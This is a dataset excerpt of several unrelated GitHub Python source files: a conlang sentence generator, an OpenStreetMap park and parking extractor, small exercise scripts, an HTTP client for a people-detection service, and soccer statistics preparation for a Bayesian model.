lextemp[i+1].replace('\\n','').split(',')\n\n if english_mode:\n ps_rules = english_ps_rules\n verb_attraction = False\n lexicon = {}\n lexicon['Intrans'] = englexicon['Intrans']\n lexicon['Trans'] = englexicon['Trans']\n lexicon['Subjunct'] = englexicon['Subjunct']\n with open('nouns.txt') as f:\n lexicon['N'] = []\n for noun in f:\n lexicon['N'].append(noun.replace('\\n','').replace(' ','').replace('[','').replace(']',''))\n with open('adjcs.txt') as f:\n lexicon['A'] = []\n for adjc in f:\n lexicon['A'].append(adjc.replace('\\n','').replace(' ','').replace('[','').replace(']',''))\n with open('preps.txt') as f:\n lexicon['P'] = []\n for prep in f:\n lexicon['P'].append(prep.replace('\\n','').replace(' ','').replace('[','').replace(']',''))\n lexicon['D'] = ['the', 'a', 'that', 'this']\n englexicon = lexicon\n\n\n\n# does some magic to recursively-ish generate a random tree using the PS-rules\n# and moves the verb around if we're dealing with verb attraction. The\n# tree starts off just \"[S[]]\", then we loop through the tree until there are no\n# \"[]\" left, replacing \"[]\" with a possible expansion of it based on the phrase\n# structure rules. For example, with English syntax, we might have \"[S[]] -\n# [S[NP[]VP[]]] - [S[NP[D N'[]]VP[V'[]]]] - S[NP[D N'[N ]]VP[V'[V ]]]]\" for a\n# simple sentence. Also, handling verb attraction, the Welsh/mirror-Welsh\n# scenario, is very tricky, involving looping through the tree, replacing S's\n# with S'[S[...] V] or S'[V S[...]] based on the head direction and keeping\n# track of where we are in the tree and all of the children of the S node.\ndef build_sentence():\n nouns = lexicon['N']\n adjcs = lexicon['A']\n preps = lexicon['P']\n detrs = lexicon['D']\n sentence = ''\n verbs = []\n engverbs = []\n tree = '[S[]]'\n done = False\n breakout = True\n start_index = 0\n while not done:\n breakout = False\n for i in range(start_index, len(tree)):\n if tree[i] == '[' and tree[i+1] == ']':\n newtree = tree[:i+1]\n token = ''\n j = i-1\n while not tree[j] == '[' and not tree[j] == ' ' and not tree[j] == ']':\n token += tree[j]\n j -= 1\n token = token[::-1]\n if token in ps_rules:\n rule = random.choice(ps_rules[token])\n if token == 'VP':\n if 'NP' in rule:\n verbs.append(random.choice(lexicon['Trans']))\n engverbs.append(random.choice(englexicon['Trans']))\n elif 'S' in rule:\n verbs.append(random.choice(lexicon['Subjunct']))\n engverbs.append(random.choice(englexicon['Subjunct']))\n else:\n verbs.append(random.choice(lexicon['Intrans']))\n engverbs.append(random.choice(englexicon['Intrans']))\n for item in rule:\n newtree += item\n if item in ps_rules:\n newtree += '[]'\n else:\n newtree += ' '\n newtree += tree[i+1:]\n tree = newtree\n breakout = True\n break\n start_index = i\n if not breakout:\n done = True\n if verb_attraction:\n done = False\n tree = tree.replace('V ', 'V* ')\n start_index = 0\n while not done:\n broken = False\n for i in range(start_index, len(tree)):\n if tree[i] == 'S' and not tree[i+1] == \"'\":\n closing_index = i\n braces = 1\n length = 0\n verb_count = 0\n in_clause = True\n while True:\n if tree[closing_index] == 'V' and not tree[closing_index + 1] == \"'\" and not tree[closing_index + 1] == 'P' and in_clause:\n verb_count += 1\n elif tree[closing_index] == '[':\n braces += 1\n elif tree[closing_index] == ']':\n braces -= 1\n elif tree[closing_index] == 'S' and closing_index > i + 3:\n in_clause = False\n closing_index += 1\n if braces == 0:\n break\n if head_first:\n length = len(\"[S'\" + 'V ' * verb_count)\n tree = tree[:i] + \"[S'\" + 'V ' * verb_count + tree[i:closing_index] + ']' + tree[closing_index:]\n else:\n length = len(\"[S'\")\n tree = tree[:i] + \"[S'\" + tree[i:closing_index+1] + 'V ' * verb_count + ']' + tree[closing_index+1:]\n broken = True\n start_index = i + length + 1\n break\n if not broken: done = True\n outer_s = True\n vindex = 0\n engsentence = ''\n for i in range(len(tree)):\n char = tree[i]\n if char == 'N' and tree[i+1] == ' ':\n j = random.randrange(len(nouns))\n sentence += nouns[j] + ' '\n engsentence += englexicon['N'][j] + ' '\n elif char == 'V' and tree[i+1] == ' ':\n sentence += verbs[vindex] + ' '\n engsentence += engverbs[vindex] + 's '\n vindex += 1\n elif char == 'P' and tree[i+1] == ' ':\n j = random.randrange(len(preps))\n sentence += preps[j] + ' '\n engsentence += englexicon['P'][j] + ' '\n elif char == 'D' and tree[i+1] == ' ':\n j = random.randrange(len(detrs))\n sentence += detrs[j] + ' '\n engsentence += englexicon['D'][j] + ' '\n elif char == 'A' and tree[i+1] == ' ':\n j = random.randrange(len(adjcs))\n sentence += adjcs[j] + ' '\n engsentence += englexicon['A'][j] + ' '\n elif char == 'B' and tree[i+1] == ' ':\n #j = random.randrange(len(adjcs))\n #sentence += advbs[j] + ' '\n #engsentence += advbs[j] + ' '\n pass\n elif char == 'S':\n if verb_attraction:\n if tree[i+1] == \"'\" and not outer_s: engsentence += 'that '\n else: outer_s = False\n else:\n if not tree[i+1] == \"'\" and not outer_s: engsentence += 'that '\n else: outer_s = False\n sentence = (sentence.capitalize()[:-1] + '.').replace('[','').replace(']','')\n engsentence = (engsentence.capitalize()[:-1] + '.').replace('[','').replace(']','')\n if english_mode: sentence = engsentence\n return sentence,engsentence\n","repo_name":"William103/Conlang_Generator_v5","sub_path":"python/syntax.py","file_name":"syntax.py","file_ext":"py","file_size_in_byte":9970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"74588858608","text":"import sys\nimport os\nimport sqlite3\nimport glob\nimport re\nimport string\nimport shapely.geometry\nimport shapely.wkt\nimport shapely.ops\nimport geojson\nimport functools\nimport pyproj\nimport osmium\nimport rtree \n\njustLettersNumbersRe = re.compile(r'[\\W]') # \\W [^a-zA-Z0-9_]., but for unicode\n\ndef normalizeName(name) :\n return justLettersNumbersRe.sub('',name).lower()\n\nprojectionToMeters = functools.partial(pyproj.transform, pyproj.Proj(init='epsg:4326'),pyproj.Proj(init='epsg:3410'))\n\nwktfab = osmium.geom.WKTFactory()\n\nclass RoadIndexHandler(osmium.SimpleHandler):\n def __init__(self):\n osmium.SimpleHandler.__init__(self)\n self.highwayList= []\n self.highwayIndex = rtree.index.Index() \n\n def way(self, o):\n if ( 'highway' in o.tags):\n val = o.tags['highway']\n osmId = o.id\n \n if ( val == 'residential' or val == 'service' or val == 'tertiary' or val == 'secondary'):\n try:\n wkt = wktfab.create_linestring(o)\n shape = shapely.wkt.loads(wkt) \n\n if ( shape.is_valid == False):\n print(\"Highway {} Has bad toplogy\".format(osmId))\n shape = shapely.geometry.Point([])\n \n except Exception as ex:\n print(\"Highway {} Has bad toplogy {}\".format(osmId,ex))\n shape = shapely.geometry.Point([])\n \n shape = shapely.ops.transform(projectionToMeters, shape) \n if not shape.is_empty :\n self.highwayIndex.insert(len(self.highwayList), shape.bounds)\n name = o.tags.get(\"name\", \"\") \n self.highwayList.append( {'osmId':osmId,'shape':shape,'highway':val, 'name' : name} )\n\n\nclass ParkingHandler(osmium.SimpleHandler):\n def __init__(self, c, highwayIndex):\n osmium.SimpleHandler.__init__(self)\n self.c = c\n self.parkingCount = 0\n\n propList = self.c.execute('SELECT osmid,geom FROM properties')\n self.propList= []\n\n self.parking = []\n self.parkingTags = []\n self.highwayIndex = highwayIndex\n\n self.propIndex = rtree.index.Index() \n\n for row in propList:\n (osmId,propGeom) = row\n shape = shapely.wkt.loads(propGeom) \n shape = shapely.ops.transform(projectionToMeters, shape) \n if not shape.is_empty :\n self.propIndex.insert(len(self.propList), shape.bounds)\n self.propList.append( {'osmId':osmId,'shape':shape} )\n \n def isParking(self,o):\n takeObj = False\n if 'amenity' in o.tags and o.tags['amenity'] == 'parking':\n takeObj = True\n return takeObj\n\n def node(self,o):\n if self.isParking(o):\n osmId = \"N\" + str( int(o.id))\n\n try:\n wkt = wktfab.create_point(o)\n shape = shapely.wkt.loads(wkt) \n\n if ( shape.is_valid == False):\n print(\"Parking Point {} Has bad toplogy\".format(osmId))\n shape = shapely.geometry.Polygon([])\n \n except Exception as ex:\n print(\"Parking Point {} Has bad toplogy {}\".format(osmId,ex))\n shape = shapely.geometry.Polygon([])\n \n self.areaParking(o,shape, osmId)\n \n def area(self,o):\n if self.isParking(o):\n\n osmId = o.id\n if ( osmId % 2 ):\n osmId = 'R' + str( int((osmId-1)/2))\n else:\n osmId = 'W' + str( int(osmId/2))\n \n try:\n wkt = wktfab.create_multipolygon(o)\n shape = shapely.wkt.loads(wkt) \n\n if ( shape.is_valid == False):\n print(\"Parking Area {} Has bad toplogy\".format(osmId))\n shape = shapely.geometry.Polygon([])\n \n except Exception as ex:\n print(\"Parking Area {} Has bad toplogy {}\".format(osmId,ex))\n shape = shapely.geometry.Polygon([])\n \n self.areaParking(o,shape, osmId)\n\n def areaParking(self,o,shape, osmId):\n\n access = o.tags.get(\"access\",\"yes\")\n name = o.tags.get(\"name\",\"\")\n\n shapeProj = shapely.ops.transform(projectionToMeters, shape) \n used = False \n if ( not shapeProj.is_empty) :\n for j in self.propIndex.intersection( shapeProj.bounds):\n prop = self.propList[j]\n dist = shapeProj.distance(prop['shape'])\n\n if ( dist < 1 or ( dist < 50 and (access == \"yes\" or access == \"public\" or access == \"permissive\"))): \n\n if ( not shape.is_empty):\n scalerank = 5\n self.parking.append( shape)\n self.parkingTags.append( {'type':'parking', 'name': name, 'scalerank' : int( scalerank ) })\n\n if ( len(name ) == 0):\n name = self.generateName(shapeProj)\n \n used = True\n wkt = shapely.wkt.dumps(shape)\n self.c.execute('insert into parking (osmId,propertyOsmID,name,geom) VALUES (?,?,?,?);',(osmId,prop['osmId'],name,wkt ))\n\n if ( used ):\n self.parkingCount += 1\n\n def generateName( self, shapeProj):\n\n nearby = list(self.highwayIndex.highwayIndex.nearest(shapeProj.bounds, 100))\n\n def sortHighways(j):\n highway = self.highwayIndex.highwayList[j]\n dist = shapeProj.distance( highway['shape'])\n return dist\n\n nearby= sorted( nearby, key=sortHighways)\n\n for j in nearby:\n highway = self.highwayIndex.highwayList[j]\n if ( len(highway['name']) > 0 ):\n return \"Off \" + highway['name']\n\n return ''\n\n\nclass PropertiesHandler(osmium.SimpleHandler):\n def __init__(self, c):\n osmium.SimpleHandler.__init__(self)\n self.c = c\n self.propertyCount = 0\n self.properties = []\n self.propertyTags = []\n \n\n townList = self.c.execute('SELECT name,geom FROM towns ORDER BY name')\n self.townList= []\n self.townIndex = rtree.index.Index() \n\n for row in townList:\n (townName,townGeom) = row\n shape = shapely.wkt.loads(townGeom) \n shape = shapely.ops.transform(projectionToMeters, shape) \n\n if ( shape.is_valid == False): \n print(\"Town {} has bad toplogy\".format(townName))\n\n self.townIndex.insert(len(self.townList), shape.bounds)\n self.townList.append( { 'townName':townName, 'shape':shape } )\n \n def isProperty(self,o):\n takeObj = False\n if 'landuse' in o.tags :\n v = o.tags['landuse']\n if v == 'conservation' or v == 'recreation_ground':\n takeObj = True\n if 'leisure' in o.tags :\n v = o.tags['leisure']\n if v == 'recreation_ground' or v == 'nature_reserve' or v == 'park':\n takeObj = True\n if 'boundary' in o.tags:\n v = o.tags['boundary']\n if v == 'national_park' or v == 'protected_area':\n takeObj = True\n return takeObj\n\n def area(self,o):\n if self.isProperty(o):\n self.areaProcessProperty(o)\n\n def areaProcessProperty(self,o):\n self.propertyCount += 1\n osmId = o.id\n if ( osmId % 2 ):\n osmId = 'R' + str( int((osmId-1)/2))\n else:\n osmId = 'W' + str( int(osmId/2))\n\n try:\n wkt = wktfab.create_multipolygon(o)\n shape = shapely.wkt.loads(wkt) \n\n if ( shape.is_valid == False):\n print(\"Area {} Has bad toplogy\".format(osmId))\n shape = shapely.geometry.Polygon([])\n \n except Exception as ex:\n print(\"Area {} Has bad toplogy {}\".format(osmId,ex))\n shape = shapely.geometry.Polygon([])\n\n boundary = o.tags.get(\"boundary\", \"\")\n landuse = o.tags.get(\"landuse\", \"\")\n leisure = o.tags.get(\"leisure\", \"\")\n\n name = o.tags.get(\"name\", \"\")\n alt_name = o.tags.get(\"alt_name\", \"\")\n website = o.tags.get(\"website\", \"\")\n wikipedia = o.tags.get(\"wikipedia\",\"\")\n openingHours = o.tags.get(\"opening_hours\",\"\")\n startDate = o.tags.get(\"start_date\",\"\")\n\n propType = \"\"\n \n if 'landuse' in o.tags :\n v = o.tags['landuse']\n if v == 'conservation':\n propType = \"conservation\"\n if v == 'recreation_ground':\n propType = \"recreation_ground\"\n\n if 'leisure' in o.tags :\n v = o.tags['leisure']\n if v == 'nature_reserve':\n propType = \"conservation\"\n if v == 'recreation_ground':\n propType = \"recreation_ground\"\n if v == 'park':\n propType = \"park\"\n \n if 'boundary' in o.tags:\n v = o.tags['boundary']\n if v == 'national_park' or v == 'protected_area':\n propType = \"conservation\"\n\n access = o.tags.get(\"access\",\"\")\n # allowed access tag values. Kill everything else.\n if ( access != \"no\" and access != \"yes\" and access != \"public\" and access != \"private\" and access != \"permissive\"):\n access = \"\"\n accessRaw = o.tags.get(\"access\",\"\")\n\n owner = o.tags.get(\"owner\", \"\")\n # fixup some known/simple errors in OSM owner names, that are really \n # not worth the trouble fixing in OSM.\n if ( owner == 'X'):\n owner = \"\"\n owner = owner.replace(\" Of \",\" of \")\n owner = owner.replace(\" And \",\" and \")\n owner = owner.replace(\"Dcr \",\"DCR \")\n owner = owner.replace(\" Llc \",\" LLC\")\n \n self.updateTownSql(osmId, name,website, owner, startDate, propType, access, accessRaw,wikipedia, openingHours, boundary, landuse, leisure, shape)\n\n shapeProj = shapely.ops.transform(projectionToMeters, shape) \n\n largestTownName = \"\"\n largestTownArea = 0\n if ( not shapeProj.is_empty and shapeProj.area > 0) :\n for j in self.townIndex.intersection( shapeProj.bounds):\n townName = self.townList[j]['townName']\n townShape = self.townList[j]['shape']\n\n\n areaInTown = shapeProj.intersection(townShape)\n if ( areaInTown.area > largestTownArea) :\n largestTownArea = areaInTown.area\n largestTownName = townName\n\n if ( areaInTown.area > 2000 or areaInTown.area/shapeProj.area > 0.20 ):\n self.c.execute('insert into propertyInsides (osmId,townName) VALUES (?,?);',(osmId,townName))\n\n if ( not shape.is_empty ):\n self.properties.append( shape)\n\n scalerank = 5\n areaSqKm = shapeProj.area / (1000*1000)\n if ( areaSqKm > 3):\n scalerank = 1\n elif ( areaSqKm > 1.5):\n scalerank = 2\n elif ( areaSqKm > 0.75):\n scalerank = 3\n elif ( areaSqKm > 0.1):\n scalerank = 4\n \n self.propertyTags.append( \n {\n 'type':propType, \n 'town':largestTownName,\n 'url': '/towns/' + largestTownName + '/' + normalizeName(name) + \".html\",\n 'website':website,\n 'owner':owner, \n 'ownerUrl':'/landowners/' + normalizeName(owner) + \".html\",\n 'name': name, \n 'areaSqKm':areaSqKm,\n 'scalerank' : int( scalerank ) \n })\n\n\n def updateTownSql( self, wayid, name,website, owner, startDate, propType, access, accessRaw,wikipedia, openingHours, boundary, landuse, leisure, shape):\n normalizedOwnerName = normalizeName(owner)\n normalizedName = normalizeName(name)\n\n existingProperty = self.c.execute('SELECT * FROM properties where osmId == ?',(wayid,))\n if ( existingProperty.fetchone() ) :\n self.c.execute(\n \"update properties set name=?,normalizedName=?,ownerName=?,normalizedOwnerName=?, \" + \n \"website=?,startDate=?,type=?,access=?,accessRaw=?,wikipedia=?, opening_hours=?, boundary=?, landuse=?, leisure=?, geom=? \" + \n \"where osmId = ?;\",\n (name,normalizedName,owner,normalizedOwnerName,website,startDate, propType, access, accessRaw,wikipedia, openingHours, boundary, landuse, leisure, shape.wkt,wayid))\n else:\n self.c.execute(\n \"insert into properties (osmId,name,normalizedName,ownerName,normalizedOwnerName, \" + \n \"website,startDate, type,access, accessRaw,wikipedia, opening_hours, boundary, landuse, leisure, updateId,publicTrailLength, geom) VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?);\",\n (wayid,name,normalizedName,owner,normalizedOwnerName,website,startDate, propType, access,accessRaw,wikipedia, openingHours, boundary, landuse, leisure, 0,0,shape.wkt))\n\n if ( len(owner) > 0 ) :\n\n # remove everything that is not a letter or number, lower case\n normalizedName = normalizeName(owner)\n\n existingOwner = self.c.execute('SELECT * FROM landowners where normalizedName == ?',(normalizedName,))\n if ( existingOwner.fetchone() == None) :\n self.c.execute('insert into landowners (name,normalizedName,updateId) VALUES (?,?,?);',(owner,normalizedName,0))\n\n\ndef updateProperties():\n conn = sqlite3.connect('mass-trails.sqlite')\n conn.execute(\"Delete from propertyInsides\")\n conn.execute(\"Delete from properties\")\n\n ph = PropertiesHandler(conn)\n\n ph.apply_file(\"massachusetts-latest.osm.pbf\", locations=True, idx='sparse_mem_array')\n\n print(\"Number of Properties: %d\" % ph.propertyCount)\n\n ownerPropertyCountList = conn.execute(\n \"select properties.normalizedOwnerName , count(osmId) \"\n \"from landowners, properties \"\n \"where landowners.normalizedName = properties.normalizedOwnerName \"\n \"group by properties.normalizedOwnerName order by count(osmId)\").fetchall()\n\n for row in ownerPropertyCountList:\n normalizedName,count = row\n\n if ( count == 0) :\n print(\"deleting {}\".format(normalizedName))\n conn.execute(\"delete landowners where landowner.normalizedName = ?\",(normalizedName,))\n\n count = conn.execute(\"select count(*) from landowners\").fetchone()\n\n print(\"Number of landowners: {}\".format(count[0]))\n\n conn.commit()\n conn.close()\n\n return ph\n\ndef updateParking():\n highwayIndex = RoadIndexHandler()\n highwayIndex.apply_file(\"massachusetts-latest.osm.pbf\", locations=True, idx='sparse_mem_array')\n\n conn = sqlite3.connect('mass-trails.sqlite')\n conn.execute(\"Delete from parking\")\n\n ph = ParkingHandler(conn, highwayIndex)\n ph.apply_file(\"massachusetts-latest.osm.pbf\", locations=True, idx='sparse_mem_array')\n\n print(\"Number of Parking Lots: %d\" % ph.parkingCount)\n\n conn.commit()\n conn.close()\n\n return ph\n\n\npropertyHandler = updateProperties()\nparkingHandler = updateParking()\n\nwith open(\"properties-osm.geojson\",\"wt\") as outputFile:\n features =[]\n\n for index, p in enumerate( propertyHandler.properties):\n\n #print(p)\n features.append( geojson.Feature(geometry=p, properties=propertyHandler.propertyTags[index]))\n\n for index, p in enumerate( parkingHandler.parking):\n #print(p)\n features.append( geojson.Feature(geometry=p, properties=parkingHandler.parkingTags[index]))\n\n featureC = geojson.FeatureCollection(features)\n maTrails = geojson.dumps(featureC)\n\n outputFile.write(maTrails)\n\n\n#updateTownBounds()\n\n \n\n","repo_name":"jremillard/mass-trails.org","sub_path":"src/properties.py","file_name":"properties.py","file_ext":"py","file_size_in_byte":16233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"5003819939","text":"\n\"\"\" Program to calculate and display a user's bonus based on sales.\nIf sales are under $1,000, the user gets a 10% bonus.\nIf sales are $1,000 or over, the bonus is 15%.\"\"\"\n\nMENU = \"What is the sales amount ? to display your Bonus\"\nprint (MENU)\nsales = float(input(\"Enter Sales: $\"))\nif sales >= 0 and sales < 1000:\n bonus = sales * 0.1\n print(\"Bonus: $\",(bonus))\nelif sales >= 1000:\n bonus = sales * 0.15\n print(\"Bonus: $\",(bonus))\nelse:\n print(\"Enter valid sales amount:\")\n\n\n","repo_name":"sharathbc88/Python-Workshop","sub_path":"practical 1/SalesBonus.py","file_name":"SalesBonus.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"6152944900","text":"from typing import List\n\nimport requests\nfrom flask import Response\n\nfrom ..primitives import BoundingBox\nfrom .errors import RequestProcessingError\nfrom ..config import DETECT_PEOPLE_PATH\n\nfrom .primitives import ServiceSpecs\n\n\nimport numpy as np\n\n\nclass PeopleDetectionServiceClient:\n\n def __init__(self,\n people_detection_service_specs: ServiceSpecs,\n service_token: str):\n self.__people_detection_service_specs = people_detection_service_specs\n self.__service_token = service_token\n\n def detect_people(self, image: np.ndarray) -> List[BoundingBox]:\n from ..utils import compose_url, image_to_jpeg_bytes\n headers = {\n 'Authorization': f'Bearer {self.__service_token}'\n }\n raw_image = image_to_jpeg_bytes(image=image)\n files = {'image': raw_image}\n url = compose_url(\n service_specs=self.__people_detection_service_specs,\n path_postfix=DETECT_PEOPLE_PATH\n )\n response = requests.post(\n url, headers=headers, files=files, verify=False\n )\n if response.status_code == 200:\n return self.__convert_valid_output(response=response)\n else:\n raise RequestProcessingError(\n f'Error code: {response.status_code}, Cause: {response.text}'\n )\n\n def __convert_valid_output(self, response: Response) -> List[BoundingBox]:\n raw_bboxes = response.json()['people']\n return [BoundingBox.from_dict(raw_bbox) for raw_bbox in raw_bboxes]\n","repo_name":"PawelPeczek/ModelAsAService","sub_path":"pipeline_sdk/pipeline_sdk/proxies/people_detection.py","file_name":"people_detection.py","file_ext":"py","file_size_in_byte":1555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"31976681453","text":"import dataload\nimport smtbmc\nimport random\n\n# -----------------------------------------------\n# configurations\n\nclipping3_modelpath = \"/home/hongce/deep_monkey/results/2019-06-24_0_neurons_10_steps_110.0_noise_0.3\"\nclipping4_modelpath = \"/home/hongce/deep_monkey/results/2019-06-25_0_neurons_10_steps_110.0_noise_0.3\"\nrelu_stable_modelpath = \"/home/hongce/deep_monkey/results/2019-06-17_0_neurons_10_steps_110.0_noise_0.3\"\noriginalPath = \"/home/hongce/deep_monkey/results/2019-06-04_0_neurons_10_steps_110.0_noise_0.3\"\n\n# -----------------------------------------------\n# main function\n\ndef gen_stimulus(idx): # [0,1] -> [-2,2]\n n = random.random()*4-2\n assert (-2 <= n <= 2)\n return n\n\ndef main():\n N = 5000\n random.seed(2000)\n weightsObj = dataload.LOADER(clipping4_modelpath, 10, clipping = 4.0)\n #weightsObj = dataload.LOADER(relu_stable_modelpath, 10)\n #weightsObj = dataload.LOADER(originalPath, 10)\n rsObj = smtbmc.RangeSampling(weightsObj)\n for i in range(N):\n if i % (N/100) == 0 and i > 0: \n print (i/N*100, '%', end = '')\n lbs, ubs = rsObj.get_node_output_range()\n print (min(lbs), max(ubs))\n rsObj.sample_a_point(50, gen_stimulus, 30, clipping=4.0)\n rsObj.update_range()\n\n rsObj.print_signs() \n lbs, ubs = rsObj.get_node_output_range()\n print ('lbs:', lbs)\n print ('ubs:', ubs)\n print (min(lbs))\n print (max(ubs)) \n \n \nif __name__ == \"__main__\":\n main()\n","repo_name":"nnarodytska/VERRNN","sub_path":"verrnn/clipping_samping.py","file_name":"clipping_samping.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"20"} +{"seq_id":"42804332267","text":"from time import time\nfrom math import sqrt\n\ndef unique(lst):\n if len(set(lst)) == len(lst):\n return lst\n else:\n return None\n\ndef check(l, mod):\n n = l[0] * 100 + l[1] * 10 + l[2]\n return n % mod\n\ndef number(arr):\n p = 0\n n = 0\n for i in reversed(range(len(arr))):\n n += arr[i] * 10**p\n p += 1\n return n\n\ndef is_prime(n):\n if n < 2: return False\n for i in range(2, int(sqrt(n)) + 1):\n if n % i == 0:\n return False\n return True\n\ndef next_prime(n):\n while not is_prime(n+1):\n n += 1\n return n + 1\n\ndef make(num, stop):\n if num == stop:\n #ONE LINER\n # [[n//100, n//10 % 10, n%10] for n in range(1, 1000) if n%17 == 0 and len(Counter(str(n))) == len(str(n))]\n #FAST\n n = stop\n while n < 1000:\n l = [n // 100, n // 10 % 10, n % 10]\n if unique(l): yield l\n n += stop\n else:\n for n in make(next_prime(num), stop):\n for i in range(10):\n dig = unique([i] + n)\n if dig and check(dig, num) == 0:\n yield dig\n\n#RUN\nresult = 0\nfor arr in make(1, 17):\n result += number(arr)\nprint(result)\n\n#BENCHMARK\n# def bm():\n# t0 = time()\n# for _ in range(1000):\n# result = 0\n# for arr in make(1, 17):\n# result += number(arr)\n# t1 = time()\n# print(t1-t0)\n","repo_name":"travisoneill/project-euler","sub_path":"python/043.py","file_name":"043.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"37907555619","text":"import http.client\n\n# Buat koneksi ke server\nconn = http.client.HTTPConnection(\"filkom.ub.ac.id\")\n\n# Kirim request\nconn.request(\"GET\", \"/\")\n# Baca response\nresp = conn.getresponse()\n\n# Baca header \nheader = resp.getheaders()\n# Baca body\nbody = resp.read()\n\n# Cetak header dan body\n#print(header)\nprint(body)","repo_name":"zeddinarief/progjar2018","sub_path":"kelasd/cobahttp.py","file_name":"cobahttp.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"20"} +{"seq_id":"46923157872","text":"from datetime import datetime as dt\nimport os\n\nimport pandas as pd\nimport simplejson as sjson\n\nimport utils as u\n\ncfg = u.get_config()\ndata_cfg = u.get_config(\"data\")\n\ndef get_feature_set_data(which_data=\"clean\", just_key_comps=True, season=None):\n feature_set_fp = os.path.join(cfg['DIRS']['CSV_OF_JSON_DATA'], f\"{which_data}/match_stats.csv\")\n data = pd.read_csv(feature_set_fp)\n\n if season is not None:\n data = data[data.league_season == int(season)].copy()\n\n if just_key_comps:\n data = data[(data[\"league_type\"] == \"League\") | (data[\"country\"] == \"World\")].copy()\n data = data[data.fixture_round != \"Finals\"].copy() # One match in Bundesliga\n \n data.sort_values(by=\"fixture_id\", inplace=True, ignore_index=True)\n \n return data\n\n\ndef get_number_of_matches(which_data=\"clean\", just_key_comps=True, season=None):\n data = get_feature_set_data(which_data=which_data, just_key_comps=just_key_comps, season=season)\n\n return len(data)\n\n\ndef get_number_of_match_stats(which_data=\"clean\", just_key_comps=True, season=None):\n data = get_feature_set_data(which_data=which_data, just_key_comps=just_key_comps, season=season)\n\n match_stat_cols = data.columns.tolist()\n for col in data_cfg[\"MATCH_INFO\"][\"COLUMNS\"]:\n match_stat_cols.remove(col)\n \n return len(match_stat_cols)/2\n\n\ndef get_all_team_names(which_data=\"clean\", just_key_comps=True, season=None):\n data = get_feature_set_data(which_data=which_data, just_key_comps=just_key_comps, season=season)\n \n home_teams = data[\"home_team_name\"].unique().tolist()\n away_teams = data[\"away_team_name\"].unique().tolist()\n\n if sorted(home_teams) == sorted(away_teams):\n return home_teams\n else:\n return {\"home_teams\": home_teams, \"away_teams\": away_teams}\n\n\ndef get_number_of_teams(which_data=\"clean\", just_key_comps=True, season=None):\n teams = get_all_team_names(which_data=which_data, just_key_comps=just_key_comps, season=season)\n\n if isinstance(teams, list):\n return len(teams)\n elif isinstance(teams, dict):\n return {\"num_home_teams\": len(teams[\"home_teams\"]), \"num_away_teams\": len(teams[\"away_teams\"])}\n\n\ndef create_team_id_mapper(which_data=\"clean\", just_key_comps=True, season=None):\n\n teams = sorted(get_all_team_names(which_data=which_data, just_key_comps=just_key_comps, season=season))\n teams_index = range(1, len(teams)+1)\n team_name_to_index_map = {teams[index-1]:index for index in teams_index}\n \n return team_name_to_index_map\n\n\ndef create_team_name_to_country_mapper(which_data=\"clean\", just_key_comps=True, season=None):\n data = get_feature_set_data(which_data=which_data, just_key_comps=just_key_comps, season=season)\n data = data[data.country != \"World\"].copy()\n data.drop_duplicates(subset=\"home_team_name\", keep=\"last\", ignore_index=True, inplace=True)\n data = data[[\"home_team_name\", \"country\"]].copy()\n data.sort_values(by=[\"country\", \"home_team_name\"], inplace=True, ignore_index=True)\n\n teams_index = range(0, len(data))\n team_name_to_country_map = {data.loc[index, \"home_team_name\"]:data.loc[index, \"country\"] for index in teams_index}\n\n return team_name_to_country_map\n\n\ndef create_game_index_to_team_index_mapper(home_or_away, which_data=\"clean\", just_key_comps=True, season=None):\n team_index_mapper = create_team_id_mapper(which_data=which_data, just_key_comps=just_key_comps, season=season)\n \n data = get_feature_set_data(which_data=which_data, just_key_comps=just_key_comps, season=season)[[\"fixture_id\", f\"{home_or_away}_team_name\"]].copy()\n data[f\"{home_or_away}_index_id\"] = data[f\"{home_or_away}_team_name\"].map(team_index_mapper)\n data = data[[f\"{home_or_away}_index_id\"]]\n \n return data\n\n\ndef create_match_stats_bugs_data(home_or_away, which_data=\"clean\", just_key_comps=True, season=None):\n data = get_feature_set_data(which_data=which_data, just_key_comps=just_key_comps, season=season)\n \n match_stat_cols = data.columns.tolist()\n for col in data_cfg[\"MATCH_INFO\"][\"COLUMNS\"]:\n match_stat_cols.remove(col)\n columns = [x for x in match_stat_cols if home_or_away in x]\n\n return data[columns].copy()\n\n\ndef combine_all_bugs_model_data(which_data=\"clean\", just_key_comps=True, season=None):\n num_matches = get_number_of_matches(which_data=which_data, just_key_comps=just_key_comps, season=season)\n num_teams = get_number_of_teams(which_data=which_data, just_key_comps=just_key_comps, season=season)\n num_match_stats = get_number_of_match_stats(which_data=which_data, just_key_comps=just_key_comps, season=season)\n\n team_id_mapper = create_team_id_mapper(which_data=which_data, just_key_comps=just_key_comps, season=season)\n team_country_mapper = create_team_name_to_country_mapper(which_data=which_data, just_key_comps=just_key_comps, season=season)\n\n home_team_game_index = create_game_index_to_team_index_mapper(\"home\", which_data=which_data, just_key_comps=just_key_comps, season=season)\n away_team_game_index = create_game_index_to_team_index_mapper(\"away\", which_data=which_data, just_key_comps=just_key_comps, season=season)\n\n bugs_model_data_dict = {\n \"num_matches\": num_matches,\n \"num_teams\": num_teams,\n \"num_match_stats\": num_match_stats,\n \"team_id_mapper\": team_id_mapper,\n \"team_country_mapper\": team_country_mapper,\n \"home_team_game_index\": home_team_game_index[\"home_index_id\"].tolist(),\n \"away_team_game_index\": away_team_game_index[\"away_index_id\"].tolist()\n }\n\n home_match_stats = create_match_stats_bugs_data(\"home\", which_data=which_data, just_key_comps=just_key_comps, season=season)\n away_match_stats = create_match_stats_bugs_data(\"away\", which_data=which_data, just_key_comps=just_key_comps, season=season)\n\n for df in [home_match_stats, away_match_stats]:\n columns = df.columns.tolist()\n home_or_away = 